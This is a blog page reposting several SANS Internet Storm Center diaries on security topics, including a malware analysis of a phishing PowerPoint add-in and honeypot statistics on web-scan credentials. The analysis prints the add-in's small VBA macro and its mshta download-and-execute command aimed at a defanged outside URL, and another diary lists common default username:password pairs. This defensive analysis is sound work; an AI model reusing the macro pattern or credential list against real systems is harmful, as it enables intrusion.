Blog

Posts Tagged business

CAD: .DGN and .MVBA Files, (Mon, Apr 26th)

Regularly I receive questions about MicroStation files, since I wrote a diary entry about AutoCAD drawings containing VBA code.

MicroStation is CAD software, and it can run VBA code.

I’ve never been given malicious MicroStation files, but recently I’ve been given a normal drawing (.dgn) and a script file (.mvba).

To be clear: these are not malware samples, the files were given to me so that I could take a look at the internal file format and report it.

Turns out that both files are “OLE files”, and can thus be analyzed with my oledump.py tool.

Here is the .DGN file:

It’s an OLE file with storage (folder) Dgn-Md containing other storages and streams.

And the metadata identifies this as a MicroStation file (I’m using tail to filter out the thumbnail data):

It does not contain VBA code: AFAIK, .DGN files can not contain VBA code. Please post a comment if I’m wrong, or if you can share a sample .DGN file containing VBA code.

The VBA script file, with extension .MVBA, is also an OLE file with VBA code streams:

Here too, the M indicator alerts us to the presence of VBA code. It can be extracted with oledump:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Sysinternals: Procmon and Sysmon update, (Sun, Apr 25th)

New versions of Procmon and Sysmon were released.

Sysmon supports a new rule: FileDeletedDetected. Use it to log deletions (without archiving the deleted file).

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Wireshark 3.4.5 Released, (Sun, Apr 25th)

Wireshark version 3.4.5 was released.

There’s one vulnerability fix and many bug fixes.

For Windows, Npcap is still at version 1.10

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Base64 Hashes Used in Web Scanning, (Sat, Apr 24th)

I have honeypot activity logs going back to May 2018 and I was curious what type of username:password combination was stored in the web traffic logs following either the Proxy-Authorization: Basic or Authorization: Basic in each logs. This graph illustrate an increase in web scanning activity for username:password over the past 3 years.

Sample Log

20210422-190644: 192.168.25.9:8088-112.112.86.46:53540 data CONNECT www.voanews.com:443 HTTP/1.1
Host: www.voanews.com:443
Proxy-Authorization: Basic Og==
User-Agent: PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
Proxy-Connection: Keep-Alive

The statistic are kind of interesting, username:password combination goes from mostly random to easily recognisable.  

Top 5 Most Popular Hashes

Og== → :
YWRtaW46YWRtaW4= → admin:admin
YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0= → admin:{12213BD1-69C7-4862-843D-260500D1DA40}
cm9vdDphZG1pbg== → root:admin
X19ld2VvaUBqMzIzMjE6X193ZzI0M3dlZjI0QEAz → [email protected]:[email protected]@3

Top 10 Hashes

Beside a single column : being the most common empty username:password combination used in the large majority of the scans, admin:admin and root:admin which comes second and forth are still active and popular today.  As for the third password, I published a diary in October 2019 about this activity noted active until May 2020, looking for NVMS9000 Digital Video Recorder which goes into more details about this activity [1].

Other often seen username:password combination that are easily guessable:

[email protected]:Jxl112912    admin:
support:admin                             admin:nbv_12345
root:123456                                admin:support
root:1234567890                        admin:qwerty
root:123321                               admin:123123
root:111111                                admin:1234
tomcat:tomcat                           admin:12345
test:test                                    admin:123456
ubnt:ubnt                                   admin:888888
user:123456                               admin:Xw22w
user:1234567890                        admin:changeme
user:123321                               default
user:111111                                 user:password
user:admin

Other interesting stats over the past 3 years is the HTTP requests and the activity by continents.

If unsure what services are being shared to the world, check what Shodan or Censys has been able to discover from a malicious actor perspective. As a home user, you can go to this page to see what Censys has been able to discover on what the router is sharing to the world.

[1] https://isc.sans.edu/forums/diary/Scanning+Activity+for+NVMS9000+Digital+Video+Recorder/25434/
[2] https://isc.sans.edu/forums/diary/Password+Reuse+Strikes+Again/26474
[3] https://isc.sans.edu/forums/diary/Will+You+Put+Your+Password+in+a+Survey/25866
[4] https://isc.sans.edu/forums/diary/Cracking+AD+Domain+Passwords+Password+Assessments+Part+1+Collecting+Hashes/23383
[5] https://isc.sans.edu/forums/diary/Password+History+Insights+Shared+by+a+Reader/22278

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Malicious PowerPoint Add-On: "Small Is Beautiful", (Fri, Apr 23rd)

Yesterday I spotted a DHL-branded phishing campaign that used a PowerPoint file to compromise the victim. The malicious attachment is a PowerPoint add-in. This technique is not new, I already analyzed such a sample in a previous diary[1]. The filename is “dhl-shipment-notification-6207428452.ppt” (SHA256:934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341) and has a VT score of 18/60[2].

The main feature of this file could be described as “small is beautiful”. A very small VBA macro is present in the file:

[email protected]:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt 
  1:       444 'x05DocumentSummaryInformation'
  2:     43736 'x05SummaryInformation'
  3:       535 'PROJECT'
  4:        44 'PROJECTwm'
  5: M    1482 'VBA/Module111'
  6:      3231 'VBA/_VBA_PROJECT'
  7:      1886 'VBA/__SRP_0'
  8:       142 'VBA/__SRP_1'
  9:       260 'VBA/__SRP_2'
 10:       103 'VBA/__SRP_3'
 11:       382 'VBA/__SRP_4'
 12:        66 'VBA/__SRP_5'
 13:       768 'VBA/dir'
 14: m    1377 'VBA/sex'
 15:        97 'sex/x01CompObj'
 16:       286 'sex/x03VBFrame'
 17:        90 'sex/f'
 18:       115 'sex/i01/x01CompObj'
 19:       220 'sex/i01/f'
 20:       110 'sex/i01/i03/x01CompObj'
 21:        40 'sex/i01/i03/f'
 22:         0 'sex/i01/i03/o'
 23:       110 'sex/i01/i04/x01CompObj'
 24:        40 'sex/i01/i04/f'
 25:         0 'sex/i01/i04/o'
 26:       148 'sex/i01/o'
 27:        48 'sex/i01/x'
 28:         0 'sex/o'

The macro is so simple but effective:

[email protected]:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 5 -v
Attribute VB_Name = "Module111"
Sub _
Auto_close()
Dim k As New sex
Shell sex.krnahai.bachikyasath.Tag
End Sub

The macro will be executed when the document is closed and refers to an object “sex”. You can see many references to this string in the first oledump output. This is a Microsoft Form:

[email protected]:/MalwareZoo/20210422$ oledump.py dhl-shipment-notification-6207428452.ppt -s 15
00000000: 01 00 FE FF 03 0A 00 00  FF FF FF FF 00 00 00 00  ................
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 19 00 00 00  ................
00000020: 4D 69 63 72 6F 73 6F 66  74 20 46 6F 72 6D 73 20  Microsoft Forms 
00000030: 32 2E 30 20 46 6F 72 6D  00 10 00 00 00 45 6D 62  2.0 Form.....Emb
00000040: 65 64 64 65 64 20 4F 62  6A 65 63 74 00 00 00 00  edded Object....
00000050: 00 F4 39 B2 71 00 00 00  00 00 00 00 00 00 00 00  ..9.q...........
00000060: 00                   

You could try to load the add-in and check the form with PowerPoint (in a sandbox!) but, most of the time, just extracting strings will do the job. Let’s search for the property “bachikyasath“:

[email protected]:/MalwareZoo/20210422$ strings dhl-shipment-notification-6207428452.ppt | 
                                    grep -A 3 -B 3 bachikyasath
sexr
UserFormN
krnahai
bachikyasath<"
Tag&
merilaylo
Attribut
--
Tab4
Tahoma
Page1a
bachikyasath"mshta""hxxps://j[.]mp/hdjkashdjkahs"
Microsoft Forms 2.0 Form
Embedded Object
Forms.Form.1

The macro just spawns a shell that executes the Microsoft tool “mshta.exe” which will download and execute the payload from hxxps://j[.]mp/hdjkashdjkahs

Unfortunately, this URL points to blogspot.com page and I was not able to grab the payload. I searched on VT and found that the same file was uploaded one day before and received a score of 0/60! (SHA256:ff1683773ad9b57473e5206023b5ef2eca5b51572bffa7b9e0559408e3e41424)

 

[1] https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162
[2] https://bazaar.abuse.ch/sample/934df0be5a13def81901b075f07f3d1f141056a406204d53f2f72ae53f583341

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

How Safe Are Your Docker Images?, (Thu, Apr 22nd)

Today, I don’t know any organization that is using Docker today. For only test and development only or to full production systems, containers are deployed everywhere! In the same way, most popular tools today have a “dockerized” version ready to use, sometimes maintained by the developers themselves, sometimes maintained by third parties. An example is the Docker container that I created with all Didier’s tools[1]. Today, we are also facing a new threat: supply chain attacks (think about Solarwinds or, more recently, CodeCov[2]). Let’s mix the attraction for container technologies and this threat, we realize that  Docker images are a great way to compromise an organization! 

When we deploy Docker images, we have to take care of two things:

  • Vulnerabilities present in the software installed in the image.
  • Potential malicious changes (implementation of a backdoor, extra SSH keys, exfiltration of data, etc…)

Many Docker images have already been detected as malicious[3] and are more difficult to detect but how to address “common” vulnerabilities? When you are implementing a vulnerability scanning process in your organization (note that I say “process” and not “tool”!), there are components that are difficult to scan like virtual machines in suspended mode and… Docker images!

Here is an interesting tool that you can add to your arsenal to quickly scan Docker images for vulnerabilities: grype[4]. Written in Go, the tool is very easy to deploy and use:

[email protected]:/# docker images|grep ssl
drwetter/testssl.sh       latest     699c2c42986f   7 weeks ago     48.5MB
jumanjiman/ssllabs-scan   latest     2a46bf22e388   10 months ago   5.66MB
[email protected]:/# grype docker:drwetter/testssl.sh:latest
 - Vulnerability DB        [no update available]
 - Loaded image
 - Parsed image
 - Cataloged packages      [36 packages]
 - Scanned image           [2 vulnerabilities]
NAME     INSTALLED  FIXED-IN  VULNERABILITY  SEVERITY
openssl  1.1.1j-r0            CVE-2021-3450  High
openssl  1.1.1j-r0            CVE-2021-3449  Medium

grype scans the contents of the Docker image to find know vulnerabilities at the operating system level (Alpine, Busybox, Ubuntu, …) but also language-specific issues (Ruby, Java, Python, …). Personally, I like the JSON output (--output=json) to process the results with other tools or index them.

My advice is to scan all your new Docker images, especially the ones that you downloaded from 3rd party websites. 

And you? How do you scan/audit your Docker images? Please share your tools/processes in the comments.

[1] https://isc.sans.edu/forums/diary/DSSuite+A+Docker+Container+with+Didiers+Tools/24926/
[2] https://www.bleepingcomputer.com/news/security/hundreds-of-networks-reportedly-hacked-in-codecov-supply-chain-attack/
[3] https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/
[4] https://github.com/anchore/grype

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

A Case for Lockdown and Isolation (and not the Covid kind), (Wed, Apr 21st)

A reader wrote in expressing concerns over a vendor software management platform that had 3rd party module vulnerabilities [1]. Reasonable risk assessment if you ask me. This comes along with the two “One Liners” we posted yesterday [2] [3]. This sounds like a case for isolation and or lockdown. Considering 2021’s climate, let’s be clear here, Digital not Physical :).

The problem space is the attack surface. Good thing, we’ve known about this for years. Bad thing, human behavior has not changed (that we are aware of) for a very long time [4]. Given that we have something we can affect and something that is HARD to change? How do we approach the risk of vulnerabilities in our management plane? Lets also add into this problem space the idea that we cannot isolate everything (again, only talking digital here). 

Now that I’ve said something that most of us have heard over and over and over and …….. over? What can we do?

The Model: Zero Trust (micro-segmentation, take your pick, but you get the idea)
note: Not all Zero Trust interpretations are equal, I use John’s (shameless name drop) [5] [6]

The Use-Case: Critical Asset that is Vulnerable
In this example we will use a device that is still running ‘telnet’ and can’t be patched nor upgraded. And before you ask? YES, in 2021, this still happens! The device type really does not matter, could be an old accounting mainframe that still is in production, or a critical building management system, and or legacy networking hardware that ‘just cannot be pulled yet.’
Risk analysis can help in replacing this asset, but that is a different road and a layer 8+ problem [7]. 
 

A Solution:
Put simply? STICK something in front of it. Not all something’s are equal, so let’s get into the details of one way (yes, I’ve done this) to solve it. It is possible, using off the shelf technology, to put an encrypted layer with Multi-Factor Authentication (MFA) and allowing access by user/group. 

– –  

The clientless VPN solutions would be configured to use the organization’s regular IDaM infrastructure with full group / user restrictions. This would point to an HTML5 proxy that provides a TLS interface to the telnet client. As long as the VPN / Firewall solution supports it, SAML becomes possible, along with MFA [8].

This is not easy, but also not impossible and remember, just because MFA is being “picked on” (probably with good reason) doesn’t stop us from using it [9]. A wise Groot once said ‘It’s better than 11%’…

Conclusion:
Those highly vulnerable critical assets can be protected, and this risk can be mitigated. The best solution would be to replace these devices, however, we know that is not always feasible. Find your most fragile devices and architect a Zero Trust posture around THOSE assets. The question that John Kindervag has told me he gets the most is “Where do I start?” and your most fragile assets seem like a good place as any. 

“Perfection is a road, not a destination” Chiun, Remo Williams

If this topic is interesting, please comment and I can dive deeper (what vendors I used, how I deployed it, results (good btw)…

Let us know in the comments.

[1] https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11172&cat=SIRT_1&actp=LIST
[2] SonicWall releases Security Notice: Email Security Zero-Day Vulnerabilities https://bit.ly/3eh1r9n
[3] PluseSecure Out of Cycle Advisory: https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/
[4] https://www.researchgate.net/profile/Nigel-Nicholson-2/publication/13115707_How_hardwired_is_human_behavior/links/5405e3580cf2bba34c1ddd0e/How-hardwired-is-human-behavior.pdf
[5] http://www.virtualstarmedia.com/downloads/Forrester_zero_trust_DNA.pdf
[6] https://media.paloaltonetworks.com/documents/Forrester-No-More-Chewy-Centers.pdf
[7] https://blog.paessler.com/is-it-possible-to-monitor-osi-model-layer-8
[8] https://krebsonsecurity.com/2020/06/turn-on-mfa-before-crooks-do-it-for-you/
[9] https://krebsonsecurity.com/2021/03/can-we-stop-pretending-sms-is-secure-now/

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 4 of 403 «...23456...»